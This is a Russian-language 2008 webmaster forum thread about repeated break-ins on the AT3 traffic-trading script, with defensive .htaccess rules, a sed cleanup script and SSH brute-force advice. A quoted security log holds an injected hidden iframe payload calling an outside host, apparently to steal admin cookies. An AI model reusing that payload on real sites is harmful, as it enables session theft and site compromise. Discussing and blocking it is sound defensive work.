Закрывайте админки ат3, опять..

Тема: Закрывайте админки ат3, опять..

цитата
24/07/08 в 03:44

Benny
свежачек напихали опять, в файл секьюрити:
Код:

<tr class=row2><td style="white-space: nowrap;">18:22 - 23 Jul</td><td style="white-space: nowrap;">system</td><td style="white-space: nowrap;">200.63.46.23 (out of range) tried to login with
'src=http://92.62.101.9/i.php> / </iframe>.</td></tr>
<tr class=row2><td style="white-space: nowrap;">18:22 - 23 Jul</td><td style="white-space: nowrap;">system</td><td style="white-space: nowrap;">200.63.46.23 (out of range) tried to login with
<iframe width=1 height=1 a=" / " b='.</td></tr>
<tr class=row2><td style="white-space: nowrap;">18:43 - 23 Jul</td><td style="white-space: nowrap;">system</td><td style="white-space: nowrap;">200.63.46.23 (out of range) tried to login with
'src=http://92.62.101.9/i.php> / </iframe>.</td></tr>
<tr class=row2><td style="white-space: nowrap;">18:43 - 23 Jul</td><td style="white-space: nowrap;">system</td><td style="white-space: nowrap;">200.63.46.23 (out of range) tried to login with
<iframe width=1 height=1 a=" / " b='.</td></tr>

билд последний стоит у меня

цитата
24/07/08 в 05:29

Foxy Babe
200.63.46.23 вот этот айпи баним

в последнем билде есть возможность ограничить доступ в админку по айпи

цитата
24/07/08 в 07:38

Soft-Com
советую такой хтаксес:

Код:

RewriteEngine on
RewriteCond %{HTTP_REFERER} ^(.*)?document.write\(unescape(.*)?$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(.*)?<\?(.*)?$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(.*)?\?>(.*)?$ [NC,OR]
- RewriteCond %{QUERY_STRING} ^(.*)?document.write\(unescape(.*)?$ [NC]
+ RewriteCond %{QUERY_STRING} ^(.*)?document.write\(unescape(.*)?$ [NC,OR]
+ RewriteCond %{QUERY_STRING} ^(.*)?iframe(.*)?$ [NC]
RewriteRule .* http://google.com/ [L]

"- " и "+ " - убрать, я просто показал что изменилось с последнего редактирования хтаксеса, который я постил в остальных темах форума по этому поводу.

цитата
24/07/08 в 10:42

Stek
ат3 в последнее время вообще не вызывает доверия в плане безопасности. Насколько знаю, многие из "ру-говорящего" адалта его уже меняют или поменяли на другие другие варианты.

цитата
24/07/08 в 11:15

Project

Так вот и хрен-то... Не понимаю, люди продолжают сидеть на этом дырявом и потенциально опасном для сижев скрипте... Ну да, Soft-Com монстр своего дела и помогает закрывать чужие дыры хтакцессами..., но с ат3 только и приходится что заниматься проверкой на "а не подломали ли снова"... Вот как будто делать больше нечего, как проверять постоянно на предмет нового говна на морде сижев...
И я, и не только я, говорили что и новый билд этого ат3 все-равно ломанут, т.к. способы устранения багов у производителя этого скрипта просто смешны! Выйдет новый билд, снова его юзерам придется обновляться, таращиться в админки и смотреть как работает новый билд...

Тут можно только пожелать удачи юзерам ат3..., терпения желать не надо, т.к. и так у них его выше крыши...

цитата
24/07/08 в 12:31

Anab0L1k
Как я понял смысл бага тотже: куки отсылаются когда админ заходит в security log?

Это уже последняя капля! +100 к Project'у

цитата
24/07/08 в 16:01

Benny
не, на морде ничего не появилось, это только попытка взлома.
к тому же пароль теперь шифрованый в ат3, но лучше все-таки его сменить.
кстати в атх подобного нет, непонятно почему.

ат3 менять не буду

, может я и мазохист но, перепробовал все скрипты - ничего не вставило

цитата
24/07/08 в 18:23

usanatol
Цитата:

ат3 менять не буду icon_smile.gif, может я и мазохист но, перепробовал все скрипты - ничего не вставило icon_smile.gif

гонять ботов это не мазохизм это самоуспокоение

цитата
24/07/08 в 18:41

Uncle Joe
так ТС ты не написал - было у тебя ограничение по айпи или не было. т.е. его научились обходить?

цитата
24/07/08 в 19:17

Benny
usanatol писал:

гонять ботов это не мазохизм это самоуспокоение

ты вот обоснуй свои слова.
в других скриптах я ничего нового не увидел из античита.
ат3 предоставляет достаточно статистики, которой хватает для анализа, плюс свои методы, о которых я писать не буду.

ну и основной показатель - сайны.

цитата
24/07/08 в 19:19

Benny
Uncle Joe писал:

так ТС ты не написал - было у тебя ограничение по айпи или не было. т.е. его научились обходить?

ограничение по айпи было выключено

цитата
24/07/08 в 21:11

Johna
Benny писал:

в других скриптах я ничего нового не увидел из античита.

какие ты другие скрипты пробовал помимо атл ?

цитата
24/07/08 в 23:03

usanatol
Цитата:

не знаю какие там методы но at3 и протон моих трейдеров в упор не видят ботов которых ATS показывает запросто и о чем может быть речь когда AT3 не показывает загрузку графики которую больше 80 ботов не грузят хотя и обрабатывают кодированный яваскрипт на котором и основанно большинство античит систем таких скриптов как AT3

цитата
24/07/08 в 23:37

Benny
а кто сказал, что ат3 показывает мне где бот а где нет, опять между строк читаешь?
ат3 - менеджер трафика, его задача раздавать траф, а не ловить ботов.

цитата
25/07/08 в 01:40

usanatol
Цитата:

а кто сказал, что ат3 показывает мне где бот а где нет, опять между строк читаешь?
ат3 - менеджер трафика, его задача раздавать траф, а не ловить ботов.

Ну вот он его и раздает в обмен на ботов. А траф сейчас раздавать умеют практически все кстати на мой взгляд если выкинуть вопрос античита TTT будет получше AT3 и базы там не сыпятся

цитата
25/07/08 в 15:08

DiamonD
Stek писал:

ат3 в последнее время вообще не вызывает доверия в плане безопасности. Насколько знаю, многие из "ру-говорящего" адалта его уже меняют или поменяли на другие другие варианты.

Всего лишь надо правильно и грамотно закрыть то, что по определению не должно быть доступно для других.. И проблем не будет абсолютно никаких..

PS. Раз ломают, значит скрипт популярен.. Захотят сломать другие, сломают, был бы прок :-)

цитата
25/07/08 в 15:18

Project
DiamonD75 писал:

Ну не все так однозначно...
Просто в ат3 ну вообще по идиотски организованы логи и прочие вещи... Ну на кой хер делать так, что с помощью форм для логина можно втолкнуть в логи ифрейм?! Это вообще уже верх идиотизма! Даже я, не будучи проф. программером не сделал бы такой ерунды... Мало того, с помощью некоторых функций процесса добавления нового трейда можно было записать любой файл в любую директорию... Это-ж ипануцца... Неужели было сложно сделать проверку на допустимые параметры записи? Это же элементарно!
Так а рассматривая их апдэйты просто слезы на глазах наворачиваются... Они не исправляют дыры..., они их просто прикрывают тазом...

И я сильно сомневаюсь, что другие скрипты будет так легко сломать, как ат3... Возможно, но с куда бОльшими затратами времени и сил...

цитата
25/07/08 в 18:58

Benny
usanatol писал:

Ну вот он его и раздает в обмен на ботов.

мы с тобой что, трейдим? откуда тебе знать что раздает мой скрипт ат3?
еще раз повторяю, за античит у меня отвечает другой скрипт.
да и топик не об этом..

цитата
26/07/08 в 09:04

Soft-Com
Project писал:

Это впихивается не только через логин, но и через in.cgi
Просто ебанутая система обработки запроса ...

-- Оффтоп --
Меня поражает когда все обсирают пхп - типа говноязык ... но на самом деле у говнопрограмистов говноруки ростут из говножопы ...
Доказано кодерами АТ3/АТХ (пишут на С

)

цитата
27/07/08 в 15:05

zteam
Soft-Com писал:

)

на С пишут скорее для того чтоб код закрыть
а вобще я полгода как перевел все сиджи на атс и нисколько не жалею..
ат3 будут ломать и дальше там ниче несделаеш, та и кто пишетего непонятно
ктото видел чтоб тот прогер хоть раз огдето тписался ?

цитата
31/07/08 в 01:54

Alexaus
Блин, никак от этого де..ма не получается отделаться. Позаливал хтаксесы в корень и cgi-bin, прописал в админке доступ только с моего ипа и всеравно, лезет и лезет, что не почищу - снова появляется, пробовал через шелл найти и вычистить все как тут на форуме писали,
сделал файлик sed.sh с кодом

#!/bin/sh
# for fname in `cat report.txt`; do
cat $fname | sed 's/ .*<script> var s.*<\/script> .*//g' > $fname.temp

if [ ! "`cat $fname.temp | md5sum`" = "`cat $fname | md5sum`" ]; then
cat $fname.temp > $fname
fi
rm $fname.temp
done

запускаю и ноль реакции, нету файла report.txt

наверняка чтото не так делаю - не получается. Помогите народ советом, у меня виртуал на Цент ОС. Ато не знаю уж что делать, хоть бери и сноси нах сервер и все снанова ставь.

цитата
31/07/08 в 06:39

Soft-Com
1. раскоментируй строку
# for fname in `cat report.txt`; do

2. Файл report.txt должен быть у тебя сгенерирован ЕЩЕ до начала запуска скрипта sed.sh - его судя по фсему нужно генерить командой грепайющей файлы на содержание строки ".*<script> var s.*<\/script> .*" - но этом на самом деле неправильно (много сиджеводов делают блоки на яваскрипте на морде сиджа для различных целей, и конструкция var s может быть целиком легитимной)

цитата
31/07/08 в 19:08

Alexaus
нифига чтото не выходит, я только что скачал файлы лога сервера, там через каждых 5 секунд вот такая шняга

host sshd(pam_unix)[20266]: authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=210.66.151.176 user=root

или такая

host sshd(pam_unix)[32594]: authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=ftp.cge.ru

падло ламануть хочет, в жизни повстречал бы - убил бы

цитата
31/07/08 в 19:39

Soft-Com
это к взлому АТ не имеет никакого отношения

у тебя ssh открыт наружу для всех айпишников.

если это так и нужно, то поставь себе denyhosts - он полечит от таких брутфорс атак.

если нет - то прикрой порт фаерволлом, или сделай по умолчанию deny правило в /etc/hosts.deny для всех кроме себя

цитата
31/07/08 в 20:50

Alexaus
Спасибо Soft-Com, я в этом не оч силен, но посоветуюсь с сапортом и чтото решим, а АТЛ буду сносить нах, такого гемора на свою голову мне больше не надо, сомневаюсь что их новые билды если такие и будут чтото решат кардинально.

Стр. 1, 2, 3 > последняя »

Новая тема Ответить

Эта страница в полной версии